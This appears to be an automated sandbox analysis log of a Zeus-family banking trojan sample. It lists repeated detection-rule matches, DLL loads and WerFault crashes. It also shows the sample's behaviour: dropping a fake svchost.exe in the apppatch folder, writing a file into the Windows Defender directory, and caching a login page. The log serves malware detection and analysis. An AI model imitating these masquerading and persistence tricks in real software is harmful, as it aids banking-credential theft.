Source: 00000002.00000003.1992581990.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2063346012.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000F.00000002.1874297883.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2053120888.0000000000F70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1873423952.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1841520196.000000000F340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1994473881.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.1911179292.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964748612.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1455296736.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.1899368962.0000000002CF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1981345088.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2017774117.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.1947004651.0000000003160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000D.00000002.1943298176.0000000002F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: WlCVLbzNph.exe PID: 6788, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: svchost.exe PID: 1736, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5584, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 3804, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1364, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2232, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 4864, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7160, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2688, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 1992, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 2800, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 7128, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 6048, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nPtwtzGyOdAtB.exe PID: 5636, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: WlCVLbzNph.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@10/52@2221/23
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00401C70 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401C70
Source: C:\Users\user\Desktop\WlCVLbzNph.exeCode function: 0_2_00402560 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402560
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vonypom.comJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\login[1].htmJump to behavior
Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5584
Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\92F35F00a
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2800
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3804
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7128
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2232
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1364
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6048
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile created: C:\Users\user\AppData\Local\Temp\5AFF.tmpJump to behavior
Source: WlCVLbzNph.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\WlCVLbzNph.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: WlCVLbzNph.exeReversingLabs: Detection: 84%
Source: WlCVLbzNph.exeString found in binary or memory: -help
Source: svchost.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\WlCVLbzNph.exeFile read: C:\Users\user\Desktop\WlCVLbzNph.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\WlCVLbzNph.exe "C:\Users\user\Desktop\WlCVLbzNph.exe"
Source: C:\Users\user\Desktop\WlCVLbzNph.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 764
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 716
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 732
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 720
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 748
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7128 -s 728
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 712
Source: C:\Users\user\Desktop\WlCVLbzNph.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: msoert2.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: inetres.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Users\user\Desktop\WlCVLbzNph.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: inetcomm.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msoert2.dllJump to behavior
